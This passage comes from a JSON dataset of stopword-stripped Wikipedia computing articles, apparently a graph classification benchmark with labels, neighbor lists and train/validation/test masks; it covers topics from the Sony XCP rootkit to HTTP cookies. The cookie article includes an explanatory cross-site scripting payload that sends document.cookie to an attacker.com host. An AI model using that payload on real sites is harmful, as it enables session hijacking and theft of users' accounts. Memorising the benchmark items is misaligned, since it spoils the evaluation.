concerns users may program posing potential security vulnerabilities update released enable users remove rootkit component computers uninstaller xcp-aurora available sony-bmg web site original uninstaller different analysis uninstaller published mark russinovich initially uncovered xcp titled sony dangerous decloaking patch eulas phoning home obtaining original uninstaller requires one use specific browser microsoft internet explorer fill online form email address receive email install patch fill second online form receive link uninstaller link personalized work multiple uninstalls furthermore sony privacy policy states address used promotions given affiliates reputable third parties may contact directly also reported original uninstaller might security problems would allow remote code execution sony uninstall page would attempt install activex control displayed internet explorer activex control marked safe scripting means web page utilize control methods methods provided control dangerous may allowed attacker upload execute arbitrary code 11 november 2005 sony announced would suspend manufacturing cds using xcp system precautionary measure sony bmg temporarily suspending manufacture cds containing xcp technology said statement also intend re-examine aspects content protection initiative sure continues meet goals security ease consumer use sony bmg added followed comments stewart baker department homeland security assistant secretary policy took drm manufacturers task reported washington post remark clearly aimed directly sony labels stewart continued important remember intellectual property computer pursuit protection intellectual property important defeat undermine security measures people need adopt days according new york times sony bmg said 4.7 million cds containing software shipped 2.1 million sold 52 albums distributed sony-bmg contained xcp 14 november 2005 sony announced recalling affected cds plans offer exchanges consumers purchased discs electronic frontier foundation published original list 19 titles 9 november 2005 15 november 2005 register published article saying may many 47 titles sony bmg says 52 xcp cds amazon says treating xcp cds defective merchandise offer refund shipping long customer specifies request various adverse side-effects xcp rationally viewed defects part apparent intended function xcp view skirts substantive issue whether sony transgressed computer owners intentionally modifying computer systems without consent",
    "neighbors": [
      1315,
      8932,
      1509,
      10756,
      839,
      2887,
      10026,
      11,
      6797,
      2128,
      10448,
      823,
      10392,
      3163,
      8797,
      9791
    ],
    "mask": "None"
  },
  {
    "node_id": 7958,
    "label": 5,
    "text": "HMAC-based_One-time_Password_algorithm:hmac-based one-time password algorithm hmac-based one-time password algorithm hotp one-time password otp algorithm based hash-based message authentication codes hmac cornerstone initiative open authentication oath hotp published informational ietf rfc 4226 december 2005 documenting algorithm along java implementation since algorithm adopted many companies worldwide see hotp algorithm freely available open standard hotp algorithm provides method authentication symmetric generation human-readable passwords values used one authentication attempt one-time property leads directly single use counter value parties intending use hotp must establish typically specified authenticator either accepted authenticated parties compute hotpvalue authenticator checks locally-generated value value supplied authenticated authenticator authenticated increment counter independently latter may increase ahead former thus resynchronisation protocol wise rfc4426 n't actually require make recommendation simply authenticator repeatedly try verification ahead counter window size authenticator counter continues forward value verification succeeds requires actions authenticated recommendation made persistent throttling hotpvalue verification take place address relatively small size thus vulnerability brute force attacks suggested verification locked small number failed attempts failed attempt attracts additional linearly-increasing delay 6-digit codes commonly provided proprietary hardware tokens number vendors informing default value truncation extracts 31 bits formula_1 ≈ 9.3 decimal digits meaning 10 10th digit providing less extra variation taking values 0 1 2 i.e. 0.3 digits verification authenticator authenticate simply generating next hotpvalue returning authenticated generate hotpvalue verify note counters guaranteed synchronised point process hotpvalue human-readable design output -digit decimal number without omission leading 0s value least significant base-10 digits hotp hotp truncation hash-based message authentication code hmac counter c key k hash function h truncation first takes 4 least significant bits mac uses offset index used select 31 bits mac starting bit 1 note 31 bits single bit short 4-byte word thus value placed inside word without using sign bit significant bit done definitely avoid modular arithmetic negative numbers many differing definitions implementations hardware software tokens available various vendors see references hardware tokens implementing oath hotp tend significantly cheaper competitors based proprietary algorithms 2010 oath hotp hardware tokens purchased marginal price products used strong passwords well oath hotp software tokens available nearly major mobile/smartphone platforms j2me android iphone blackberry maemo macos windows mobile although reception computer press negative 2004 2005 ietf adopted hotp rfc 4226 december 2005 various vendors started produce hotp compatible tokens and/or whole authentication solutions according paper strong authentication entitled road map replacing passwords otp authentication published burton group division gartner inc. 2010 gartner expectation hardware otp form factor continue enjoy modest growth smartphone otps grow become default hardware platform time",
    "neighbors": [
      2208,
      9732,
      3309,
      10961,
      1083,
      4575
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7959,
    "label": 2,
    "text": "TR-DOS:tr-dos tr-dos disk operating system zx spectrum beta disc beta 128 disc interfaces tr-dos beta disc developed technology research ltd uk 1984 became standard disk releases zx spectrum especially modern programs made tr-dos opposed disk systems current emulators support tr-dos disk images formats .trd .scl clone interface also used russian pentagon scorpion machines latest official firmware version 5.03 1986 unofficial versions various enhancements bug-fixes released since 1990 latest 6.10e 2006 tr-dos handles ss/ds sd/dd floppy disks modern versions support ram disk versions support hard disks",
    "neighbors": [
      7823,
      4409,
      2933,
      5359
    ],
    "mask": "Test"
  },
  {
    "node_id": 7960,
    "label": 4,
    "text": "CyberCIEGE:cyberciege cyberciege serious game designed teach network security concepts development sponsored u.s. navy used training tool agencies u.s. government universities community colleges cyberciege covers broad range cybersecurity topics players purchase configure computers network devices keep demanding users happy e.g. providing internet access protecting assets variety attacks game includes number different scenarios focus basic training awareness others advanced network security concepts scenario development kit available creating customizing scenarios network security components include configurable firewalls vpn gateways vpn clients link encryptors authentication servers workstations servers include access control lists acls may configured operating systems enforce label-based mandatory access control policies players deploy public key infrastructure pki -based cryptography protect email web traffic vpns game also includes identity management devices biometric scanners card readers control access workstations physical areas cyberciege game engine consumes “ scenario development language ” describes scenario terms users goals assets values initial state scenario terms pre-existing components conditions triggers provide flow scenario game engine defined enough fidelity host scenarios ranging e-mail attachment awareness cyber warfare cyberciege scenarios place player situations player must make information assurance decisions interactive simulation illustrates potential consequences player choices terms attacks information assets disruptions authorized user access assets game employs hyperbole means engaging students scenario thus simulation intended always identify actual consequences specific choices game confronts student problems conflicts questions considered developing implementing security policy game designed construction management simulation set three-dimensional virtual world players build networks observe virtual users thoughts scenario divided multiple phases phase includes one objectives player must achieve prior moving next phase players view status virtual user ’ success achieving goals i.e. accessing enterprise assets via computers networks unproductive users express unhappy thoughts utter comic book style speech bubbles bang keyboards players see consequences attacks lost money pop-up messages video clips burning computers cyberciege includes sophisticated attack engine assesses network topologies component configurations physical security user training procedural security settings attack engine weighs resultant vulnerabilities attacker motives compromise assets network—and motive may vary asset thus assets might defended via firewall assets might require air gap high assurance protection mechanisms attack types include trojan horses viruses trap doors denial service insiders i.e. bribed users lack background checks un-patched flaws physical attacks attack engine coupled economy engine measures virtual user ’ ability achieve goals i.e. read write assets using computers networks combination supports scenarios illustrate real-world trade-offs use air-gaps versus risks cross-domain solutions accessing assets classified unclassified networks game engine includes defined set assessable conditions resultant triggers allow scenario designer provide players feedback e.g. bubble speech characters screen tickers pop-up messages etc transition game new phases fidelity game engine intended high enough players make meaningful choices respect deploying network security countermeasures high engulf player administrative minutiae cyberciege illustrates abstract functions technical protection mechanisms configuration-related vulnerabilities example attack might occur particular firewall port left open specific software service patched cyberciege designed provide fairly consistent level abstraction among various network computer components technical countermeasures seen considering several cyberciege game components cyberciege firewalls include network filters let players block traffic selected application “ ports ” e.g. telnet players configure filters different network interfaces different traffic directions lets players see consequences leaving ports open e.g. attacks allows players experience need open ports e.g. one characters might unable achieve goal unless filter configured allow ssh traffic cyberciege includes vpn gateways computer based vpn mechanisms players configure identify characteristics protection e.g. encryption authentication neither provided network traffic depending source destination allows cyberciege illustrate risks associated providing unprotected internet access workstation vpn tunnel corporate network network components e.g. workstations include configuration choices related type component cyberciege lets players select consequential password policies procedural configuration settings",
    "neighbors": [
      3521,
      939,
      8998
    ],
    "mask": "Test"
  },
  {
    "node_id": 7961,
    "label": 4,
    "text": "SkyGrabber:skygrabber skygrabber software russian company skysoftware accepts input digital satellite tuner card hard drive recording used iraqi insurgents group kata'ib hezbollah intercept mq-1 predator drone video feeds encrypted encryption feeds removed performance reasons",
    "neighbors": [
      9440,
      1064,
      6797,
      7983,
      9233
    ],
    "mask": "Test"
  },
  {
    "node_id": 7962,
    "label": 8,
    "text": "Helicon_Ape:helicon ape helicon ape piece software helicon tech destined introduce apache functionality iis web servers helicon ape realized asp.net module iis 7 higher implementing functionality 35 apache modules allows using apache configurations leaving syntax intact iis extend standard iis capabilities aside realization apache modules helicon ape possesses proprietary modules server-side debugging profiling mod_developer seo optimization mod_linkfreeze hotlinking protection mod_hotlink helicon ape gui interface see screenshot allows easy configs editing directives auto-completion spell-check features supported browsing includes regular expressions tester password generation utility list modules currently supported helicon ape helicon ape designed specifically benefit advantages iis 7 architecture 100 operability ensured iis 7 higher windows vista windows server 2008 windows 7 windows server 2008 r2 iis6 windows server 2003 helicon ape offers slightly limited functionality see compatibility chart three license types available helicon ape",
    "neighbors": [
      225,
      865,
      4074,
      6797,
      7983,
      5012,
      4439,
      8639
    ],
    "mask": "Test"
  },
  {
    "node_id": 7963,
    "label": 3,
    "text": "Bulldozer_(microarchitecture):bulldozer microarchitecture amd bulldozer family 15h microprocessor microarchitecture fx opteron line processors developed amd desktop server markets bulldozer codename family microarchitectures released october 12 2011 successor k10 microarchitecture bulldozer designed scratch development earlier processors core specifically aimed computing products tdps 10 125 watts amd claims dramatic performance-per-watt efficiency improvements high-performance computing hpc applications bulldozer cores bulldozer cores support instruction sets implemented intel processors available introduction including sse4.1 sse4.2 aes clmul avx well new instruction sets proposed amd abm xop fma4 f16c bulldozer gen4 excavator supports avx2 instruction sets according amd bulldozer-based cpus based globalfoundries 32 nm silicon insulator soi process technology reuses approach dec multitasking computer performance arguments according press notes balances dedicated shared computer resources provide highly compact high units count design easily replicated chip performance scaling words eliminating redundant elements naturally creep multicore designs amd hoped take better advantage hardware capabilities using less power bulldozer-based implementations built 32nm soi hkmg arrived october 2011 servers desktops server segment included dual chip 16-core opteron processor codenamed interlagos socket g34 single chip 4 6 8 cores valencia socket c32 zambezi 4 6 8 cores targeted desktops socket am3+ bulldozer first major redesign amd ’ processor architecture since 2003 firm launched k8 processors also features two 128-bit fma-capable fpus combined one 256-bit fpu design accompanied two integer clusters 4 pipelines fetch/decode stage shared bulldozer also introduced shared l2 cache new architecture amd calls design module 16-core processor design would feature eight modules operating system recognize module two logical cores modular architecture consists multithreaded shared l2 cache flexfpu uses simultaneous multithreading physical integer core two per module single threaded contrast intel hyperthreading two virtual simultaneous threads share resources single physical core bulldozer introduced clustered multithreading cmt parts processor shared two threads parts unique thread terms hardware complexity functionality bulldozer cmt module equal dual-core processor integer power either single-core processor dual core floating-point power depending whether code saturated floating point instructions threads running cmt module whether fpu performing 128-bit 256-bit floating point operations reason two integer cores floating-point unit consisting pair 128-bit fmac execution units cmt simpler similar design philosophy smt designs try utilize execution units efficiently either method two threads compete execution pipelines loss performance one threads due dedicated integer cores bulldozer family modules performed roughly like dual core dual thread processor sections code either wholly integer mix integer floating point yet due smt use shared floating point pipelines module would perform similarly single core dual thread smt processor smt2 pair threads saturated floating point instructions last two comparisons make assumption comparison processor possesses equally wide capable execution core integer-wise floating-point wise respectively cmt smt peak effectiveness running integer floating point code pair threads cmt stays peak effectiveness working pair threads consisting integer code smt one threads underperform due competition integer execution units disadvantage cmt greater number idle integer execution units single threaded case single threaded case cmt limited use half integer execution units module smt imposes limit large smt core integer circuitry wide fast two cmt cores could theory momentarily twice integer performance single thread case realistically general code whole pollack rule estimates speedup factor formula_1 approximately 40 increase performance cmt processors typical smt processor similar efficient shared use l2 cache pair threads longer pipeline allowed bulldozer family processors achieve much higher clock frequency compared k10 predecessors increased frequencies throughput longer pipeline also increased latencies increased branch misprediction penalties issue widths peak instruction executions per cycle jaguar k10 bulldozer core 2 3 4 respectively made bulldozer superscalar design compared jaguar/bobcat however due k10 somewhat wider core addition lack refinements optimizations first generation design bulldozer architecture typically performed somewhat lower ipc compared k10 predecessors refinements made piledriver steamroller ipc bulldozer family distinctly began exceed k10 processors phenom ii first revenue shipments bulldozer-based opteron processors announced september 7 2011 fx-4100 fx-6100 fx-8120 fx-8150 released october 2011 remaining fx series amd processors released end first quarter 2012 major sources cpu-world xbit-labs two series bulldozer-based processors servers opteron 4200 series socket c32 code named valencia four modules opteron 6200 series socket g34 code named interlagos 8 modules november 2015 amd sued california consumers legal remedies act unfair competition law allegedly misrepresenting specifications bulldozer chips class-action lawsuit filed 26 october us district court northern district california claims bulldozer module fact single cpu core dual-core traits rather true dual-core design 24 october 2011 first generation tests done phoronix confirmed performance bulldozer cpu somewhat less expected many tests cpu performed level older generation phenom 1060t performance later substantially increased various compiler optimizations cpu driver fixes released first bulldozer cpus met mixed response discovered fx-8150 performed poorly benchmarks highly threaded falling behind second-generation intel core i* series processors matched even outperformed amd phenom ii x6 lower clock speeds highly threaded benchmarks fx-8150 performed par phenom ii x6 intel core i7 2600k depending benchmark given overall consistent performance intel core i5 2500k lower price results left many reviewers underwhelmed processor found extremely power-hungry load especially overclocked compared intel sandy bridge 13 october 2011 amd stated blog community feel product performance meet expectations showed benchmarks actual applications outperformed sandy bridge i7 2600k amd x6 1100t january 2012 microsoft released two hotfixes windows 7 server 2008 r2 marginally improve performance bulldozer cpus addressing thread scheduling concerns raised release bulldozer 6 march 2012 amd posted knowledge base article stating compatibility problem fx processors certain games widely used digital game distribution platform steam amd stated provided bios update several motherboard manufacturers namely asus gigabyte technology msi asrock would fix problem september 2014 amd ceo rory read conceded bulldozer design game-changing part amd live design four years july 29 2015 microsoft released direct x 12 api dx12 windows 10 operating system api allows programmers achieve greater parallelism notably graphics intensive game titles dx12 titles make better use higher core counts high thread count processor bulldozer family fx-6300 fx-8100 series chips extending usability systems windows 10 31 august 2011 amd group well-known overclockers including brian mclachlan sami mäkinen aaron schradin simon solotko managed set new world record cpu frequency using unreleased overclocked fx-8150 bulldozer processor day record sat 8.309 ghz bulldozer combined liquid helium cooling reached new high 8.429 ghz record since overtaken 8.58 ghz andre yang using liquid nitrogen august 22 2014 using fx-8370 piledriver stilt team finland achieved maximum cpu frequency 8.722 ghz piledriver amd codename improved second-generation microarchitecture based bulldozer amd piledriver cores found socket fm2 trinity richland based series apus cpus socket am3+ vishera based fx-series cpus piledriver last generation bulldozer family available socket am3+ available l3 cache piledriver processors available fm2 mobile variant sockets come l3 cache l2 cache last-level cache fm2/fm2+ processors steamroller amd codename third-generation microarchitecture based improved version piledriver steamroller cores found socket fm2+ kaveri based series apus cpus excavator codename fourth-generation bulldozer core excavator implemented 'carrizo a-series apus athlon x4 cpus",
    "neighbors": [
      3586,
      6151,
      5645,
      7699,
      8231,
      2088,
      2094,
      7218,
      2113,
      7234,
      2140,
      2655,
      4194,
      3175,
      5223,
      7783,
      8810,
      4205,
      1137,
      630,
      6774,
      9337,
      7802,
      8322,
      8327,
      10375,
      10383,
      7313,
      153,
      9369,
      2719,
      4767,
      6815,
      2210,
      5798,
      4270,
      7858,
      4286,
      2764,
      5329,
      4308,
      9428,
      2264,
      731,
      1260,
      5356,
      9964,
      6909,
      8447,
      5380,
      4872,
      785,
      9500,
      11047,
      2345,
      5948,
      833,
      6978,
      8514,
      5956,
      9541,
      4423,
      11080,
      7497,
      330,
      1866,
      2394,
      11618,
      9582,
      4465,
      2943,
      3457,
      9092,
      3464,
      398,
      9122,
      5541,
      9126,
      11183,
      10675,
      1461,
      8629,
      1463,
      1480,
      2008,
      473,
      2536,
      1515,
      1005,
      10734,
      499,
      2549,
      4603,
      508,
      3070
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7964,
    "label": 2,
    "text": "Post_processor:post processor post processor unique driver specific cnc machine robot mechanism machines start different locations require extra movement operation post-processor works cam software off-line programming software make sure g-code output program correct specific trademark machine control cabinet fanuc siemens-sinumeric mazak-mazatrol heidenhein deckel-maho etc cam software uses geometry cad model converts g-code cam software analyzes cad model determines tooling toolpaths used mill desired features requires cam post processor generates exact g-code dialect used machine control module sinumeric fanuc mazatrol heidenhein toshiba etc targeted instance translation often referred post different “ post ” g-code dialect cam software supports post processors usually convert g-code one dialect next rather “ post ” uses intermediate format captures g-code commands dialect-independent form cam software accomplishes intermediate format called cl.data please adjust terms post processor software subroutine sub-program converts graphical non-graphical cam software toolpath outcome specific nc control fanuc sinumeric mazatrol heidenhein post processor independent hardware software adapting compiling toolpath machine readable language motions post-processor alter program output suit specific machine post used complex things like producing proprietary machine language g-code m-code post-processor may used start machine specific position another example use post-processor would atc automatic-tool-change cnc post-processor required correct tool collected correct location devices connect computer using serial communication cnc devices connect using parallel communication post-processor influence communication machine software post processors context web development development general",
    "neighbors": [
      5896,
      4121
    ],
    "mask": "None"
  },
  {
    "node_id": 7965,
    "label": 4,
    "text": "HTTP_cookie:http cookie http cookie also called web cookie internet cookie browser cookie simply cookie small piece data sent website stored user computer user web browser user browsing cookies designed reliable mechanism websites remember stateful information items added shopping cart online store record user browsing activity including clicking particular buttons logging recording pages visited past also used remember arbitrary pieces information user previously entered form fields names addresses passwords credit card numbers cookies perform essential functions modern web perhaps importantly authentication cookies common method used web servers know whether user logged account logged without mechanism site would know whether send page containing sensitive information require user authenticate logging security authentication cookie generally depends security issuing website user web browser whether cookie data encrypted security vulnerabilities may allow cookie data read hacker used gain access user data used gain access user credentials website cookie belongs see cross-site scripting cross-site request forgery examples tracking cookies especially third-party tracking cookies commonly used ways compile long-term records individuals browsing histories potential privacy concern prompted european u.s. lawmakers take action 2011 european law requires websites targeting european union member states gain informed consent users storing non-essential cookies device google project zero researcher jann horn describes ways cookies read intermediaries like wi-fi hotspot providers recommends use browser incognito mode circumstances term cookie coined web browser programmer lou montulli derived term magic cookie packet data program receives sends back unchanged used unix programmers magic cookies already used computing computer programmer lou montulli idea using web communications june 1994 time employee netscape communications developing e-commerce application mci vint cerf john klensin represented mci technical discussions netscape communications mci want servers retain partial transaction states led ask netscape find way store state user computer instead cookies provided solution problem reliably implementing virtual shopping cart together john giannandrea montulli wrote initial netscape cookie specification year version 0.9beta mosaic netscape released october 13 1994 supported cookies first use cookies labs checking whether visitors netscape website already visited site montulli applied patent cookie technology 1995 granted 1998 support cookies integrated internet explorer version 2 released october 1995 introduction cookies widely known public time particular cookies accepted default users notified presence general public learned cookies financial times published article february 12 1996 year cookies received lot media attention especially potential privacy implications cookies discussed two u.s. federal trade commission hearings 1996 1997 development formal cookie specifications already ongoing particular first discussions formal specification started april 1995 www-talk mailing list special working group within internet engineering task force ietf formed two alternative proposals introducing state http transactions proposed brian behlendorf david kristol respectively group headed kristol lou montulli soon decided use netscape specification starting point february 1996 working group identified third-party cookies considerable privacy threat specification produced group eventually published rfc 2109 february 1997 specifies third-party cookies either allowed least enabled default time advertising companies already using third-party cookies recommendation third-party cookies rfc 2109 followed netscape internet explorer rfc 2109 superseded rfc 2965 october 2000 rfc 2965 added codice_1 header informally came called rfc 2965-style cookies opposed original codice_2 header called netscape-style cookies codice_1 seldom used however deprecated rfc 6265 april 2011 written definitive specification cookies used real world session cookie also known in-memory cookie transient cookie non-persistent cookie exists temporary memory user navigates website web browsers normally delete session cookies user closes browser unlike cookies session cookies expiration date assigned browser knows treat session cookies instead expiring web browser closed session cookies persistent cookie expires specific date specific length time means cookie entire lifespan long short creators want information transmitted server every time user visits website belongs every time user views resource belonging website another website advertisement reason persistent cookies sometimes referred tracking cookies used advertisers record information user web browsing habits extended period time however also used legitimate reasons keeping users logged accounts websites avoid re-entering login credentials every visit secure cookie transmitted encrypted connection i.e https transmitted unencrypted connections i.e http makes cookie less likely exposed cookie theft via eavesdropping cookie made secure adding codice_4 flag cookie http-only cookie accessed client-side apis javascript restriction eliminates threat cookie theft via cross-site scripting xss however cookie remains vulnerable cross-site tracing xst cross-site request forgery xsrf attacks cookie given characteristic adding codice_5 flag cookie 2016 google chrome version 51 introduced new kind cookie same-site cookie sent requests originating origin target domain restriction mitigates attacks cross-site request forgery xsrf cookie given characteristic setting codice_6 flag codice_7 codice_8 normally cookie domain attribute match domain shown web browser address bar called first-party cookie third-party cookie however belongs domain different one shown address bar sort cookie typically appears web pages feature content external websites banner advertisements opens potential tracking user browsing history often used advertisers effort serve relevant advertisements user example suppose user visits codice_9 website contains advertisement codice_10 downloaded sets cookie belonging advertisement domain codice_10 user visits another website codice_12 also contains advertisement codice_10 sets cookie belonging domain codice_10 eventually cookies sent advertiser loading advertisements visiting website advertiser use cookies build browsing history user across websites ads advertiser websites setting cookies readable 100 third-party domains average single website setting 10 cookies maximum number cookies first- third-party reaching 800 modern web browsers contain privacy settings block third-party cookies supercookie cookie origin top-level domain codice_15 public suffix codice_16 ordinary cookies contrast origin specific domain name codice_17 supercookies potential security concern therefore often blocked web browsers unblocked browser attacker control malicious website could set supercookie potentially disrupt impersonate legitimate user requests another website shares top-level domain public suffix malicious website example supercookie origin codice_15 could maliciously affect request made codice_17 even cookie originate codice_17 used fake logins change user information public suffix list helps mitigate risk supercookies pose public suffix list cross-vendor initiative aims provide accurate up-to-date list domain name suffixes older versions browsers may up-to-date list therefore vulnerable supercookies certain domains term supercookie sometimes used tracking technologies rely http cookies two supercookie mechanisms found microsoft websites august 2011 cookie syncing respawned muid machine unique identifier cookies etag cookies due media attention microsoft later disabled code zombie cookie cookie automatically recreated deleted accomplished storing cookie content multiple locations flash local shared object html5 web storage client-side even server-side locations cookie absence detected cookie recreated using data stored locations cookie consists following components cookies originally introduced provide way users record items want purchase navigate throughout website virtual shopping cart shopping basket today however contents user shopping cart usually stored database server rather cookie client keep track user assigned shopping cart server sends cookie client contains unique session identifier typically long string random letters numbers cookies sent server every request client makes session identifier sent back server every time user visits new page website lets server know shopping cart display user another popular use cookies logging websites user visits website login page web server typically sends client cookie containing unique session identifier user successfully logs server remembers particular session identifier authenticated grants user access services session cookies contain unique session identifier makes amount personal information website save user virtually limitless—the website limited restrictions concerning large cookie session cookies also help improve page load times since amount information session cookie small requires little bandwidth cookies used remember information user order show relevant content user time example web server might send cookie containing username last used log website may filled automatically next time user logs many websites use cookies personalization based user preferences users select preferences entering web form submitting form server server encodes preferences cookie sends cookie back browser way every time user accesses page website server personalize page according user preferences example google search engine used cookies allow users even non-registered ones decide many search results per page wanted see also duckduckgo uses cookies allow users set viewing preferences like colors web page tracking cookies used track users web browsing habits also done extent using ip address computer requesting page referer field http request header cookies allow greater precision demonstrated follows analyzing log file possible find pages user visited sequence long corporations exploit users web habits tracking cookies collect information buying habits wall street journal found america top fifty websites installed average sixty-four pieces tracking technology onto computers resulting total 3,180 tracking files data collected sold bidding corporations cookies arbitrary pieces data usually chosen first sent web server stored client computer web browser browser sends back server every request introducing states memory previous events otherwise stateless http transactions without cookies retrieval web page component web page would isolated event largely unrelated page views made user website although cookies usually set web server also set client using scripting language javascript unless cookie codice_5 flag set case cookie modified scripting languages cookie specifications require browsers meet following requirements order support cookies cookies set using codice_2 http header sent http response web server header instructs web browser store cookie send back future requests server browser ignore header support cookies disabled cookies example browser sends first request homepage codice_9 website get /index.html http/1.1 host www.example.org server responds two codice_2 headers http/1.0 200 ok content-type text/html set-cookie theme=light set-cookie sessiontoken=abc123 expires=wed 09 jun 2021 10:18:14 gmt server http response contains contents website homepage also instructs browser set two cookies first theme considered session cookie since codice_27 codice_28 attribute session cookies intended deleted browser browser closes second sessiontoken considered persistent cookie since contains codice_27 attribute instructs browser delete cookie specific date time next browser sends another request visit codice_30 page website request contains codice_31 http header contains two cookies server instructed browser set get /spec.html http/1.1 host www.example.org cookie theme=light sessiontoken=abc123 way server knows request related previous one server would answer sending requested page possibly including codice_2 headers response order add new cookies modify existing cookies delete cookies value cookie modified server including codice_2 header response page request browser replaces old value new value value cookie may consist printable ascii character codice_34 codice_35 unicode codice_36 codice_37 excluding codice_38 codice_39 whitespace characters name cookie excludes characters well codice_40 since delimiter name value cookie standard rfc 2965 restrictive implemented browsers term cookie crumb sometimes used refer cookie name–value pair cookies also set scripting languages javascript run within browser javascript object codice_41 used purpose example instruction codice_42 creates cookie name temperature value 20 addition name value cookies also one attributes browsers include cookie attributes requests server—they send cookie name value cookie attributes used browsers determine delete cookie block cookie whether send cookie server codice_43 codice_44 attributes define scope cookie essentially tell browser website cookie belongs obvious security reasons cookies set current resource top domain sub domains another domain sub domains example website codice_45 set cookie domain codice_46 would allow codice_45 website control cookies codice_46 cookie codice_43 codice_44 attributes specified server default domain path resource requested however browsers difference cookie set codice_46 without domain cookie set codice_46 domain former case cookie sent requests codice_46 also known host-only cookie latter case sub domains also included example codice_54 notable exception general rule edge prior windows 10 rs3 internet explorer prior ie 11 windows 10 rs4 april 2018 always send cookies sub domains regardless whether cookie set without domain example codice_2 http response headers sent website user logged http request sent webpage within codice_54 subdomain http/1.0 200 ok set-cookie lsid=dqaaak…eaem_vyg path=/accounts expires=wed 13 jan 2021 22:23:01 gmt secure httponly set-cookie hsid=ayqevn…dkrdst domain=.foo.com path=/ expires=wed 13 jan 2021 22:23:01 gmt httponly set-cookie ssid=ap4p…gteq domain=foo.com path=/ expires=wed 13 jan 2021 22:23:01 gmt secure httponly first cookie codice_57 codice_43 attribute codice_44 attribute set codice_60 tells browser use cookie requesting pages contained codice_61 domain derived request domain two cookies codice_62 codice_63 would used browser requests subdomain codice_64 path example codice_65 prepending dot optional recent standards added compatibility rfc 2109 based implementations codice_27 attribute defines specific date time browser delete cookie date time specified form codice_67 form codice_68 values yy yy greater equal 0 less equal 69 alternatively codice_28 attribute used set cookie expiration interval seconds future relative time browser received cookie example three codice_2 headers received website user logged http/1.0 200 ok set-cookie lu=rg3vhjznehyljvg7qi3bzjzg expires=tue 15 jan 2013 21:47:38 gmt path=/ domain=.example.com httponly set-cookie made_write_conn=1295214458 path=/ domain=.example.com set-cookie reg_fb_gate=deleted expires=thu 01 jan 1970 00:00:01 gmt path=/ domain=.example.com httponly first cookie codice_71 set expire sometime 15 january 2013 used client browser time second cookie codice_72 expiration date making session cookie deleted user closes browser third cookie codice_73 value changed deleted expiration time past browser delete cookie right away expiration time past note cookie deleted domain path attributes codice_2 field match values used cookie created codice_4 codice_5 attributes associated values rather presence attribute names indicates behaviors enabled codice_4 attribute meant keep cookie communication limited encrypted transmission directing browsers use cookies via secure/encrypted connections however web server sets cookie secure attribute non-secure connection cookie still intercepted sent user man-in-the-middle attacks therefore maximum security cookies secure attribute set secure connection codice_5 attribute directs browsers expose cookies channels http https requests means cookie accessed via client-side scripting languages notably javascript therefore stolen easily via cross-site scripting pervasive attack technique modern browsers support cookies allow user disable following common options default internet explorer allows third-party cookies accompanied p3p cp compact policy field add-on tools managing cookie permissions also exist cookies important implications privacy anonymity web users cookies sent server setting server internet domain web page may contain images components stored servers domains cookies set retrieval components called third-party cookies older standards cookies rfc 2109 rfc 2965 specify browsers protect user privacy allow sharing cookies servers default however newer standard rfc 6265 explicitly allows user agents implement whichever third-party cookie policy wish browsers mozilla firefox internet explorer opera google chrome allow third-party cookies default long third-party website compact privacy policy published newer versions safari block third-party cookies planned mozilla firefox well initially planned version 22 postponed indefinitely advertising companies use third-party cookies track user across multiple sites particular advertising company track user across pages placed advertising images web bugs knowledge pages visited user allows advertising company target advertisements user presumed preferences website operators disclose third-party cookie use consumers run risk harming consumer trust cookie use discovered clear disclosure privacy policy tends eliminate negative effects cookie discovery possibility building profile users privacy threat especially tracking done across multiple domains using third-party cookies reason countries legislation cookies united states government set strict rules setting cookies 2000 disclosed white house drug policy office used cookies track computer users viewing online anti-drug advertising 2002 privacy activist daniel brandt found cia leaving persistent cookies computers visited website notified violating policy cia stated cookies intentionally set stopped setting december 25 2005 brandt discovered national security agency nsa leaving two persistent cookies visitors computers due software upgrade informed nsa immediately disabled cookies 2002 european union launched directive privacy electronic communications policy requiring end users consent placement cookies similar technologies storing accessing information users equipment particular article 5 paragraph 3 mandates storing data user computer done user provided information data used user given possibility denying storing operation directive 95/46/ec defines data subject consent freely given specific informed indication wishes data subject signifies agreement personal data relating processed consent must involve form communication individuals knowingly indicate acceptance 2009 policy amended directive 2009/136/ec included change article 5 paragraph 3 instead option users opt cookie storage revised directive requires consent obtained cookie storage june 2012 european data protection authorities adopted opinion clarifies cookie users might exempt requirement gain consent industry response largely negative robert bond law firm speechly bircham describes effects far-reaching incredibly onerous uk companies simon davis privacy international argues proper enforcement would destroy entire industry p3p specification offers possibility server state privacy policy using http header specifies kind information collects purpose policies include limited use information gathered using cookies according p3p specification browser accept reject cookies comparing privacy policy stored user preferences ask user presenting privacy policy declared server however p3p specification criticized web developers complexity websites correctly implement example facebook jokingly used honk p3p header period internet explorer provides adequate support specification third-party cookies blocked browsers increase privacy reduce tracking advertising tracking companies without negatively affecting user web experience many advertising operators opt-out option behavioural advertising generic cookie browser stopping behavioural advertising websites use cookies identifiers user sessions methods identifying web users limitations vulnerabilities website uses cookies session identifiers attackers impersonate users requests stealing full set victims cookies web server point view request attacker authentication victim requests thus request performed behalf victim session listed various scenarios cookie theft user session hijacking even without stealing user cookies work websites relying solely http cookies user identification traffic network intercepted read computers network sender receiver particularly unencrypted open wi-fi traffic includes cookies sent ordinary unencrypted http sessions network traffic encrypted attackers therefore read communications users network including http cookies well entire contents conversations purpose man-in-the-middle attack attacker could use intercepted cookies impersonate user perform malicious task transferring money victim bank account issue resolved securing communication user computer server employing transport layer security https protocol encrypt connection server specify codice_4 flag setting cookie cause browser send cookie encrypted channel tls connection attacker able cause dns server cache fabricated dns entry called dns cache poisoning could allow attacker gain access user cookies example attacker could use dns cache poisoning create fabricated dns entry codice_81 points ip address attacker server attacker post image url server example codice_82 victims reading attacker message would download image codice_81 since codice_81 sub-domain codice_85 victims browsers would submit codice_17-related cookies attacker server attacker able accomplish usually fault internet service providers properly securing dns servers however severity attack lessened target website uses secure cookies case attacker would extra challenge obtaining target website tls certificate certificate authority since secure cookies transmitted encrypted connection without matching tls certificate victims browsers would display warning message attacker invalid certificate would help deter users visiting attacker fraudulent website sending attacker cookies cookies also stolen using technique called cross-site scripting occurs attacker takes advantage website allows users post unfiltered html javascript content posting malicious html javascript code attacker cause victim web browser send victim cookies website attacker controls example attacker may post message codice_85 following link href= onclick= window.location 'http //attacker.com/stole.cgi text= escape document.cookie return false click /a another user clicks link browser executes piece code within codice_88 attribute thus replacing string codice_41 list cookies accessible current page result list cookies sent codice_90 server attacker malicious posting https website codice_91 secure cookies also sent attacker.com plain text responsibility website developers filter malicious code attacks mitigated using httponly cookies cookies accessible client-side 